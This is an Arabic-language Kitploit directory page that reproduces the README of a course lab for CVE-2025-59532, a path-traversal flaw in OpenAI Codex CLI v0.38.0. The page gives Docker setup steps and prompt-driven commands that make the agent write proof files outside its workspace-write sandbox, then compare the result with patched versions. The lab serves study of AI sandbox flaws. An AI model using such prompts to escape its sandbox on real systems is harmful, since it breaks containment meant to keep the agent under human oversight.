Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-59532-poc — بيئة بحثية مبنية على Docker لتحليل CVE-2025-59532، وهي ثغرة اجتياز مسار في OpenAI Codex CLI تتيح كتابة ملفات تعسفية خارج صندوق حماية مساحة العمل المقصودة. جزء من مساق CMU: 18-739 القرصنة والأمن الهجومي في خريف 2025. | Kitploit
أدوات/GitHubGitHub/baktistr/cve-2025-59532-poc
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubbaktistr/cve-2025-59532-poc

cve-2025-59532-poc

بيئة بحثية مبنية على Docker لتحليل CVE-2025-59532، وهي ثغرة اجتياز مسار في OpenAI Codex CLI تتيح كتابة ملفات تعسفية خارج صندوق حماية مساحة العمل المقصودة. جزء من مساق CMU: 18-739 القرصنة والأمن الهجومي في خريف 2025.

عرض المستودع
13منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بيئة Docker لـ CVE-2025-59532

بيئة بحثية مبنية على Docker لتحليل CVE-2025-59532، وهي ثغرة اجتياز مسار في أداة Codex CLI من OpenAI تسمح بكتابة ملفات عشوائية خارج نطاق الحماية المعزولة لمساحة العمل المقصودة. جزء من مقرر CMU: 18-739 الاختراق والأمن الهجومي في خريف 2025

البدء

استنساخ المستودع

أولاً، استنسخ هذا المستودع:

root@kitploit:~
git clone https://github.com/jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

أو إذا كنت تستخدم SSH:

root@kitploit:~
git clone [email protected]:jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

وصف الثغرة

CVE-2025-59532 هي ثغرة اجتياز مسار في أداة Codex CLI من OpenAI تسمح للمهاجمين بكتابة ملفات خارج دليل مساحة العمل المقصود، متجاوزةً قيود الحماية المعزولة.

تفاصيل الثغرة

  • معرّف الثغرة: CVE-2025-59532
  • الإصدار المتأثر: Codex CLI v0.38.0 والإصدارات الأقدم
  • نوع الثغرة: كتابة ملفات عشوائية / اجتياز المسار
  • الخطورة: عالية
  • متجه الهجوم: يمكن للمهاجم صياغة مطالبات (prompts) تجعل Codex يكتب ملفات إلى الدلائل الأصلية (مثل ../exploit.txt)، هاربًا من الحماية المعزولة لمساحة العمل حتى عند تفعيل --sandbox workspace-write.
  • الأثر: إنشاء ملفات غير مصرّح بها في أدلة النظام، وإمكانية تصعيد الامتيازات، والمساس بحدود أمان الحاويات.
  • التصحيح: أُصلح في الإصدار v0.39.0 مع تحسين التحقق من المسارات وتنقيتها.

كيف تعمل الثغرة

تستغل الثغرة عدم كفاية التحقق من المسارات في تطبيق الحماية المعزولة لمساحة العمل. عند تفعيل وضع الحماية المعزولة workspace-write، يجب أن يقيّد Codex عمليات الملفات في دليل مساحة العمل المخصص. ومع ذلك، في الإصدار v0.38.0، يفشل التحقق من المسارات في التعامل بشكل صحيح مع تسلسلات اجتياز المسار النسبية (../)، مما يسمح للمهاجم بكتابة ملفات خارج الحماية المعزولة عن طريق توجيه الذكاء الاصطناعي لاستخدام مراجع الدلائل الأصلية.

المتطلبات الأساسية

  • تثبيت Docker على نظامك
  • مفتاح OpenAI API (يمكنك الحصول عليه من https://platform.openai.com/api-keys)
  • فهم أساسي لـ Docker وعمليات سطر الأوامر
  • Git (لاستنساخ المستودع)

البناء والتشغيل

بناء صورة Docker:

root@kitploit:~
docker build -t cve-2025-59532:latest .

تشغيل الحاوية:

root@kitploit:~
docker run -it --rm cve-2025-59532:latest

الاستخدام

تتضمن بيئة Docker هذه ثلاثة إصدارات من Codex CLI:

  • codex38 - v0.38.0 (الإصدار المُعرَّض للثغرة)
  • codex39 - v0.39.0 (الإصدار المُصلَح)
  • codex50 - v0.50.0 (أحدث إصدار)

إعداد مفتاح OpenAI API

بمجرد الدخول إلى الحاوية، قم بإعداد مفتاح OpenAI API الخاص بك بمجرد تشغيل codex في الوضع التفاعلي ولصق المفتاح هناك:

root@kitploit:~
codex

سيتم تخزين مفتاح API في ~/.config/codex/auth.json وسيُستخدم بواسطة جميع إصدارات Codex (codex38، codex39، codex50).

التحقق من الإصدارات

root@kitploit:~
codex38 --version  # Should show v0.38.0 (vulnerable)
codex39 --version  # Should show v0.39.0 (patched)
codex50 --version  # Should show v0.50.0 (latest)

اختبار الثغرة

ملاحظة: تقع مساحة العمل في /workspace/child. تسمح الثغرة بالكتابة إلى /workspace (الدليل الأصلي).

اختبار الإصدار المُعرَّض للثغرة (v0.38.0):

root@kitploit:~
codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof1.txt' in the parent directory with content 'CVE-2025-59532 POC'"

اختبار الإصدار المُصلَح (v0.39.0):

root@kitploit:~
codex39 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof2.txt' in the parent directory with content 'CVE-2025-59532 POC'"

اختبار أحدث إصدار (v0.50.0):

root@kitploit:~
codex50 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof3.txt' in the parent directory with content 'CVE-2025-59532 POC'"

تحقق من الاستغلال:

root@kitploit:~
# Check if files were created outside the sandbox (in /workspace, not /workspace/child)
ls -la /workspace/
cat /workspace/exploit_proof1.txt  # Should exist if v0.38.0 is vulnerable
cat /workspace/exploit_proof2.txt  # Should NOT exist if v0.39.0 is patched
cat /workspace/exploit_proof3.txt  # Should NOT exist if v0.50.0 is secure

# Check current workspace (should be empty or contain only test files)
pwd  # Should show /workspace/child
ls -la /workspace/child/

فحص السجلات

لعرض سجلات تصحيح مفصّلة لتنفيذ Codex:

root@kitploit:~
RUST_LOG=debug codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof.txt' in the parent directory with content 'CVE-2025-59532 POC'"

ستُظهر سجلات التصحيح ما يلي:

  • طلبات واستجابات API
  • محاولات التحقق من المسارات
  • تفاصيل عمليات الملفات
  • سلوك فرض الحماية المعزولة (أو تجاوزها)
تنزيل الأداة